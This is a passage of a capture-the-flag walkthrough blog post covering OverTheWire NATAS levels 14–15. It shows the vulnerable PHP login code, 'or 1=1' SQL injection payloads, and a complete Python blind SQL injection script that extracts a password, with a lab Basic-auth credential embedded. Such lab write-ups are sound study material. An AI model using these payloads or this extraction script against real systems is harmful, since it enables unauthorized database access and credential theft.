  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"Executing query: </span><span class="nv">$query</span><span class="s2">&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$link</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"Successful login! The password for natas15 is &lt;censored&gt;&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"Access denied!&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="nb">mysql_close</span><span class="p">(</span><span class="nv">$link</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"index.php"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
Username: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">"username"</span><span class="nt">&gt;&lt;br&gt;</span>
Password: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">"password"</span><span class="nt">&gt;&lt;br&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Login"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="cp">&lt;?</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure><p>There is a simple SQL Injection vulnerability since the input has no filters or checks on it. Sending a double quote character will break the SQL and prove the vulnerability:</p><p><img class="alignnone size-full wp-image-239" data-src="/assets/img/2019/09/2019-09-13_10h54_10.png" data-proofer-ignore></p><p>A simple SQLi statement should get us in, we don’t even need to put anything in the password field if we comment out the rest of the query. The most basic statement is <code class="language-plaintext highlighter-rouge">“or 1=1 —- </code> but it only works if there’s a trailing space. I suppose that’s so the query sees the comment mark ‘–‘ instead of ‘–\”‘. Alternatively, you could probably use the other comment character “#”.</p><p><img class="alignnone size-full wp-image-240" data-src="/assets/img/2019/09/2019-09-13_11h00_23.png" data-proofer-ignore></p><p> </p><h3 id="level-15"><span class="mr-2">LEVEL 15</span><a href="#level-15" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-241" data-src="/assets/img/2019/09/2019-09-13_11h03_14.png" data-proofer-ignore></p><p>And the sourcecode:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>
<span class="cm">/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"username"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
  <span class="nv">$link</span> <span class="o">=</span> <span class="nb">mysql_connect</span><span class="p">(</span><span class="s1">'localhost'</span><span class="p">,</span> <span class="s1">'natas15'</span><span class="p">,</span> <span class="s1">'&lt;censored&gt;'</span><span class="p">);</span>
  <span class="nb">mysql_select_db</span><span class="p">(</span><span class="s1">'natas15'</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
  
  <span class="nv">$query</span> <span class="o">=</span> <span class="s2">"SELECT * from users where username=</span><span class="se">\"</span><span class="s2">"</span><span class="mf">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"</span><span class="se">\"</span><span class="s2">"</span><span class="p">;</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"Executing query: </span><span class="nv">$query</span><span class="s2">&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="nv">$res</span> <span class="o">=</span> <span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
  <span class="k">if</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"This user exists.&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"This user doesn't exist.&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"Error in query.&lt;br&gt;"</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="nb">mysql_close</span><span class="p">(</span><span class="nv">$link</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"index.php"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
Username: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">"username"</span><span class="nt">&gt;&lt;br&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Check existence"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="cp">&lt;?</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure><p>It looks like another SQL Injection just like the previous level. Let’s try a basic SQLi statement like before:</p><p><code class="language-plaintext highlighter-rouge">"or 1=1 -- </code></p><p><img class="alignnone size-full wp-image-242" data-src="/assets/img/2019/09/2019-09-13_11h05_51.png" data-proofer-ignore></p><p>So it’s proven to be vulnerable, now we need to exploit it to get the password out. I checked that natas16 is a user, so we need to pull the password out of that record specifically.</p><p>The script only shows a few different possible outputs, depending on the state of the result, suppressing any error messages. So this is a Blind SQL Injection and requires more patience to exploit.</p><p>Best way that I know of is to validate each character of the password with the output states “This user exists” or “This user doesn’t exist”. Since doing this by hand will take forever and a day, a python script is how I chose to do it. Here is my code to get the password:</p><figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/python3
#
# main execution script for solving natas15 on OverTheWire.org
</span>
<span class="kn">import</span> <span class="nn">requests</span>

<span class="c1"># All possible characters
</span><span class="n">allChars</span> <span class="o">=</span> <span class="s">'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>
<span class="c1"># Characters used
</span><span class="n">usedChars</span> <span class="o">=</span> <span class="s">''</span>
<span class="c1"># Final Password
</span><span class="n">password</span> <span class="o">=</span> <span class="s">''</span>
<span class="c1"># Our target URL
</span><span class="n">target</span> <span class="o">=</span> <span class="s">"http://natas15.natas.labs.overthewire.org"</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
  <span class="s">'User-Agent'</span><span class="p">:</span> <span class="s">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101'</span><span class="p">,</span>
  <span class="s">'Authorization'</span><span class="p">:</span> <span class="s">'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='</span><span class="p">,</span>
<span class="p">}</span>


<span class="k">def</span> <span class="nf">send_query</span><span class="p">(</span><span class="n">query</span><span class="p">):</span>
  <span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="n">query</span><span class="p">}</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Payload: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
  <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">target</span> <span class="o">+</span> <span class="s">'/index.php?'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
  <span class="k">return</span> <span class="n">response</span>


<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="k">if</span> <span class="n">r</span><span class="p">.</span><span class="n">status_code</span> <span class="o">!=</span> <span class="n">requests</span><span class="p">.</span><span class="n">codes</span><span class="p">.</span><span class="n">ok</span><span class="p">:</span>
  <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="s">'Couldn</span><span class="se">\'</span><span class="s">t connect to target :('</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
  <span class="k">print</span><span class="p">(</span><span class="s">'Target reachable. Starting character parsing...'</span><span class="p">)</span>

<span class="c1"># Get list of characters used so we don't have to iterate unnecessarily
</span><span class="k">print</span><span class="p">(</span><span class="s">"Getting list of characters used..."</span><span class="p">)</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">allChars</span><span class="p">:</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Trying Character: "</span> <span class="o">+</span> <span class="n">c</span><span class="p">)</span>
  <span class="n">resp</span> <span class="o">=</span> <span class="n">send_query</span><span class="p">(</span><span class="s">'natas16" and password like "%s%s%s" #'</span> <span class="o">%</span> <span class="p">(</span><span class="s">"%"</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="s">"%"</span><span class="p">))</span>
  <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">resp</span><span class="p">.</span><span class="n">content</span><span class="p">):</span>
    <span class="n">usedChars</span> <span class="o">+=</span> <span class="n">c</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Character found: "</span> <span class="o">+</span> <span class="n">c</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Characters used: "</span> <span class="o">+</span> <span class="n">usedChars</span><span class="p">)</span>

<span class="c1"># Retrieve the password one char at a time
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">33</span><span class="p">):</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Testing password..."</span><span class="p">)</span>
  <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">usedChars</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Trying Character: "</span> <span class="o">+</span> <span class="n">c</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Password so far: "</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">send_query</span><span class="p">(</span><span class="s">'natas16" and ascii(substring((select password from users where username="natas16"),%d,1))=%s #'</span> <span class="o">%</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">)))</span>
    <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">resp</span><span class="p">.</span><span class="n">content</span><span class="p">):</span>
      <span class="n">password</span> <span class="o">+=</span> <span class="n">c</span>
      <span class="k">break</span>

<span class="k">print</span><span class="p">(</span><span class="s">'Password: '</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span></code></pre></figure></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/walkthrough/'>Walkthrough</a>, <a href='/categories/overthewire/'>OverTheWire</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/web/" class="post-tag no-text-decoration" >web</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=OverTheWire: NATAS 11 &amp;#8211; 15 - MegaWattSec&amp;url=https://megawattsec.com/posts/overthewire-natas-11/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=OverTheWire: NATAS 11 &amp;#8211; 15 - MegaWattSec&amp;u=https://megawattsec.com/posts/overthewire-natas-11/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://megawattsec.com/posts/overthewire-natas-11/&amp;text=OverTheWire: NATAS 11 &amp;#8211; 15 - MegaWattSec" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/hackthebox-haystack/">HackTheBox: Haystack</a><li><a href="/posts/hackthebox-craft/">HackTheBox: Craft</a><li><a href="/posts/hackthebox-bastion/">HackTheBox: Bastion</a><li><a href="/posts/hackthebox-jarvis/">HackTheBox: Jarvis</a><li><a href="/posts/hackthebox-swagshop/">HackTheBox: SwagShop</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/overthewire-natas-16/"><div class="card-body"> <em class="timeago small" data-ts="1568402533" > 2019-09-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 16 &#8211; 20</h3><div class="text-muted small"><p> LEVEL 16 This level looks a lot like level 9 did with the dictionary lookup and it suggests there are now more input checks. Let’s see the source: {% highlight php %} Find words containing: ...</p></div></div></a></div><div class="card"> <a href="/posts/overthewire-natas-21/"><div class="card-body"> <em class="timeago small" data-ts="1568659795" > 2019-09-16 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 21 &#8211; 25</h3><div class="text-muted small"><p> LEVEL 21 This level has a second site associated with it, where all the action is: Main Site PHP sourcecode of the main page: {% highlight php %} &amp;lt;? function print_credentials() { if...</p></div></div></a></div><div class="card"> <a href="/posts/overthewire-natas-26/"><div class="card-body"> <em class="timeago small" data-ts="1568918412" > 2019-09-19 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 26 &#8211; 27</h3><div class="text-muted small"><p> LEVEL 26 The sourcecode: {% highlight php %} &amp;lt;?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/overthewire-natas/" class="btn btn-outline-primary" prompt="Older"><p>OverTheWire: NATAS 0 &#8211; 10</p></a> <a href="/posts/overthewire-natas-16/" class="btn btn-outline-primary" prompt="Newer"><p>OverTheWire: NATAS 16 &#8211; 20</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/megawattsec">Dustin</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
